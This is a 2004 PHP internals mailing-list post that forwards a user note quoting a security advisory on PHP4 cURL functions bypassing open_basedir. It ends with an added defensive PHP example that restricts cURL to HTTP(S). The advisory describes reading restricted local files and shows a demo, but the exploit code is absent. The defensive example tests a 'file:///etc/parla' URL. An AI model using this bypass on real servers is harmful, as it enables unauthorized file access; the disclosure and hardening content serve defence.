Newsgroups: php.internals
Message-ID: <41811956.4050405@caedmon.net>
Date: Thu, 28 Oct 2004 12:07:50 -0400
To: internals@lists.php.net
Subject: [Fwd: [PHP-NOTES] note 46955 added to function.curl-init]
From: sean@caedmon.net (Sean Coates)

Is this legitimate? I took a (very) quick look at bugs, and didn't see it.

(deleted the note)

S

-------- Original Message --------
Subject: [PHP-NOTES] note 46955 added to function.curl-init
Date: Thu, 28 Oct 2004 09:03:55 -0700
From: mars012.mail.ru@osu1.php.net (a)
To: php-notes@lists.php.net

from http://www.packetstormsecurity.org/0410-advisories/php4curl.txt

====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compiled with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Type: Local
Risk: Low/Medium
=====================================================

PHP cURL functions bypass open_basedir protection, so users can navigate through the filesystem.
For example, setting "open_basedir" in php.ini to "/var/www/html" anybody can retrieve "/etc/parla" using cURL functions.

== Proof of concept (curl.php) ==

Demo

$ cat /etc/parla
don't read please!
$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline

No release timeline.

--
FraMe
http://www.kernelpanik.org

----
Manual Page -- http://www.php.net/manual/en/function.curl-init.php
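
An added example, not part of the advisory or of this mail and not PHP's own fix: one way application code can keep a cURL handle confined to HTTP(S) so that it cannot be used to read local files, whatever open_basedir is set to. It assumes the local read goes through a non-HTTP URL scheme handled by libcurl (the advisory's proof-of-concept code is not preserved on this page); `url_scheme_allowed` and `hardened_curl_init` are hypothetical names, and the code needs PHP 7+ with ext/curl.

```php
<?php
// Added example: hypothetical helpers, not code from the advisory or from PHP.

/** True only when $url carries an explicit http or https scheme. */
function url_scheme_allowed(string $url): bool
{
    // parse_url() returns null when no scheme is present and false on
    // seriously malformed input; both are rejected by is_string().
    $scheme = parse_url($url, PHP_URL_SCHEME);
    return is_string($scheme)
        && in_array(strtolower($scheme), ['http', 'https'], true);
}

/** Create a cURL handle that can only speak HTTP(S), redirects included. */
function hardened_curl_init(string $url)
{
    if (!url_scheme_allowed($url)) {
        throw new InvalidArgumentException('URL scheme not allowed');
    }

    $allowed = CURLPROTO_HTTP | CURLPROTO_HTTPS;
    $ch = curl_init();

    // Restrict the protocols libcurl will use for the initial request ...
    curl_setopt($ch, CURLOPT_PROTOCOLS, $allowed);
    // ... and for any redirect target, so a remote server cannot steer
    // the handle to another scheme.
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, $allowed);

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    return $ch;
}

// Constructed sample inputs: one remote URL, one local-file URL, one bare path.
$samples = ['https://www.php.net/', 'file:///etc/parla', '/etc/parla'];
foreach ($samples as $candidate) {
    printf("%-22s %s\n", $candidate,
        url_scheme_allowed($candidate) ? 'allowed' : 'rejected');
}
```

The scheme check alone covers only the URL the caller supplies; the two protocol options are what bind the handle itself.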